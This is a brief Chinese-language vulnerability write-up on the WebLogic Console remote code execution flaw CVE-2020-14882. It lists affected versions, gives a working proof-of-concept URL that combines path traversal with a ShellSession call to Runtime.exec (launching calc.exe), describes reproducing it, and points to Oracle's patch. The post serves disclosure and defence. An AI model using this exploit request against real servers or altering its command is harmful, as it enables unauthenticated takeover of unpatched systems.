Weblogic Console HTTP协议远程代码执行漏洞(CVE-2020-14882)

1.漏洞描述

未经身份验证的远程攻击者可通过构造特殊的 HTTP GE请求,利用该漏洞在受影响的WebLogic Server上执行任意代码。

2.影响版本

  • Oracle Weblogic Server 10.3.6.0.0
  • Oracle Weblogic Server 12.1.3.0.0
  • Oracle Weblogic Server 12.2.1.3.0
  • Oracle Weblogic Server 12.2.1.4.0
  • Oracle Weblogic Server 14.1.1.0.0

3.漏洞POC

http://127.0.0.1:7001/console/css/%2e%2e%2fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27calc.exe%27);%22);

4.漏洞复现

在weblogic登录地址后输入poc,成功弹出计算器

Weblogic Console HTTP协议远程代码执行漏洞(CVE-2020-14882)_第1张图片

5.漏洞修复

官方修复方案:

此次 Oracle 官方的 CPU已发布了针对该漏洞的补丁,请受影响用户及时下载补丁程序并安装更新。

你可能感兴趣的:(Weblogic Console HTTP协议远程代码执行漏洞(CVE-2020-14882))